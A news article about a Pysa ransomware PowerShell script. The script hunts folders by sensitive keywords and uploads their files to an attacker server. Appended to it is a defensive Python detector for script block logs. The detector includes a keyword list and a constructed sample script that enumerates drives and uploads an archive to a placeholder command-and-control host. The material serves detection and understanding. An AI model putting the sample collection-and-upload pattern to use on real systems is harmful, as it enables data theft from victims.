Ransomware PowerShell script sheds light on hacker tactics

A PowerShell script used by the ransomware group Pysa has shed light on the types of data that cybercriminals try to steal during their attacks.

When ransomware operators break into a network, they usually start with limited access to one device. They then use various tools and exploits to steal other credentials or gain elevated privileges on different devices. Once they gain access to a Windows domain controller, they search for and steal data before encrypting devices.

Attackers use the stolen data to set the ransom amount, based on the company's revenue and insurance coverage, and to pressure the victim into paying by threatening to publish the data.

MalwareHunterTeam has shared with BleepingComputer a PowerShell script used by the Pysa ransomware group to find and steal data from a server. The script scans every drive on the device for folders whose names match a list of specific strings. If a folder matches the search criteria, the script uploads the folder's files to a remote server under the attackers' control.

Of particular interest are the 123 keywords, which give an idea of what data the ransomware operators consider valuable. The script looks for files related to financial or confidential company information, such as audits, banking information, credentials, tax forms, student information, social security numbers, and SEC documents.

However, it also looks for more intriguing keywords that could be especially damaging to the company in the event of a leak, such as folders whose names contain the words "crime", "investigation", "fraud", "bureau", "federal", "hidden", "secret", "illegal" and "terror".
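As an added example (not the Pysa script, and not code from BleepingComputer or MalwareHunterTeam), a small Python detector a defender could run over PowerShell script block log text (Event ID 4104) to flag scripts that combine drive enumeration, an upload primitive and several of the keywords quoted above. The enumeration and upload indicators and the two sample script texts are assumptions constructed for this example.

```python
import re

# Keywords the article says the script hunts for (a subset of the 123 it reports).
SENSITIVE_KEYWORDS = [
    "audit", "bank", "credential", "tax", "student", "ssn", "social security",
    "sec", "crime", "investigation", "fraud", "bureau", "federal", "hidden",
    "secret", "illegal", "terror",
]
# Match whole tokens so that "sec" does not fire on "second" or "secret".
KEYWORD_RE = re.compile(
    r"(?<![a-z0-9])(" + "|".join(re.escape(k) for k in SENSITIVE_KEYWORDS) + r")(?![a-z0-9])", re.I)
# Drive/folder enumeration primitives (assumed indicators, not taken from the article).
ENUMERATE_RE = re.compile(r"Get-PSDrive|Win32_LogicalDisk|Get-ChildItem[^\n]*-Recurse", re.I)
# Bulk outbound transfer primitives (assumed indicators, not taken from the article).
UPLOAD_RE = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|UploadFile|UploadData|Net\.WebClient", re.I)


def score_script(script_text):
    """Describe how closely one script block resembles keyword-driven folder collection."""
    hits = sorted({m.group(1).lower() for m in KEYWORD_RE.finditer(script_text)})
    return {
        "keyword_hits": hits,
        "enumerates_drives": bool(ENUMERATE_RE.search(script_text)),
        "uploads": bool(UPLOAD_RE.search(script_text)),
    }


def is_suspicious(script_text, min_keywords=5):
    """Flag only when enumeration, an upload primitive and a sizeable keyword list all appear together."""
    s = score_script(script_text)
    return s["enumerates_drives"] and s["uploads"] and len(s["keyword_hits"]) >= min_keywords


# Constructed stand-ins for Event ID 4104 script block text (not real captured scripts).
BENIGN_CLEANUP = """
Get-ChildItem C:\\Temp -Recurse | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item
"""
COLLECTION_SKETCH = """
$names = @('audit','bank','tax','ssn','fraud','secret','illegal')
Get-WmiObject Win32_LogicalDisk | ForEach-Object { Get-ChildItem $_.DeviceID -Directory -Recurse }
(New-Object Net.WebClient).UploadFile('http://PLACEHOLDER-C2/', $archive)
"""

if __name__ == "__main__":
    for name, text in (("cleanup", BENIGN_CLEANUP), ("collection", COLLECTION_SKETCH)):
        print(name, is_suspicious(text), score_script(text))
```

The benign cleanup script also enumerates a folder recursively, which is why the rule requires all three signals rather than enumeration alone.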
